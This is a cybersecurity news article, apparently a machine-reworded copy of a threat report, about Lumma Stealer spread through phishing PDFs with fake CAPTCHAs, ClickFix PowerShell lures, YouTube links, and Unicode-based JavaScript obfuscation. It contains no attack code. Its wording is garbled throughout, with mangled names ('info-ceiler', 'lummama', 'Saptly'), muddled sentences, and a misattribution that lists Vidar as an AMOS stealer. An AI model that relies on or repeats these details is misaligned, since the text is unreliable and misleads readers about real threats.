Cybersecurity researchers have discovered a wide range of phishing campaigns offering Lumma Stealer Malware using fake Captcha images shared via PDF documents hosted on Webflow’s Content Delivery Network (CDN).
Netskope Threat Labs said it has discovered 260 unique domains that host 5,000 phishing PDF files that redirect victims to malicious websites.
“Attackers use SEO to click on malicious search engine results to trick the victim into visiting the page,” security researcher Jan Michael Alcantara said in a report shared with Hacker News.
“Most phishing pages focus on stealing credit card information, but some PDF files contain fake Captchas that can be found in which the victim runs malicious powershell commands, leading to the Lumma Stealer malware.”
The phishing campaign is estimated to have affected more than 1,150 organizations and more than 7,000 users since the second half of 2024, with the attacks primarily selecting victims from North America, Asia and Southern Europe in the technology, financial services and manufacturing sectors.
Of the 260 domains identified to host fake PDFs, the majority of them are related to Webflow, followed by those related to GoDaddy, Strikingly, Wix, and Saptly.
It has also been observed that attackers upload some of their PDF files to legitimate online libraries and PDF repositories such as PDFCOFFEE, PDF4PRO, PDFBEAN, and Internet Archives.
The PDF contains fraudulent Captcha images that act as a conduit for stealing credit card information. Alternatively, the Lumma Stealer distribution includes images and downloads documents that will take the victim to a malicious site when clicked.
For that part, this site pretends to be a fake Captcha verification page that uses the Clickfix technique to deceive the clickfix technique to run MSHTA commands that run Stealer malware by a PowerShell script.
Over the past few weeks, Lumma Stealer has also been disguised as a cracked version of the Total Commander Tool for Roblox games and Windows, highlighting the myriad delivery mechanisms employed by various threat actors. Users will be redirected to these websites via YouTube videos that are likely uploaded from previously compromised accounts.
“Malicious links and infected files are often disguised. [YouTube videos, comments, or descriptions,” Silent Push said. “Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats.”
The cybersecurity company further found that Lumma Stealer logs are being shared for free on a relatively new hacking forum called Leaky[.]A professional that started operation in late December 2024.
Lumma Stealer is a fully functional Crimeware solution sold under the Malware as a Service (MAAS) model, offering a way to harvest a wide range of information from compromised Windows hosts. In early 2024, malware operators announced Ghostsocks to integrate with Golang-based proxy malware.
“Adding Socks5’s backconnect functionality to existing Lumma infections or malware for that issue is a huge advantage for threat actors,” Infrawatch said.
By leveraging “victims” internet connections, attackers can bypass geographical restrictions and IP-based integrity checks, particularly those enforced by financial institutions and other high-value targets. This ability uses the credentials harvested via the info-ceiler log to significantly improve the chances of successful attempts for unauthorized access, further increasing infection after the appearance of lummama.
According to Zscaler Threatlabz and Esentire, steeler malware (AMOS) such as Vidar and Atomic Macos Stealer (AMOS) are distributed using Lures using the Clickfix method.
Phishing attacks were discovered to abuse the first documented technique in October 2024: JavaScript obfuscation method that uses invisible Unicode characters to represent binary values.
This approach requires using Unicode filler characters, especially the half width of Hangul (U+FFA0) and the full width of Hangul (U+3164), to represent binary values 0 and 1, respectively, and convert each ASCII character in the JavaScript payload to a Hangul equivalent.
“Attacks containing private information are highly personalized, and the initial JavaScript attempts to abort the attack by calling a debugger breakpoint if it is being analyzed, detecting delays, and then redirecting to a benign website.”
Source link
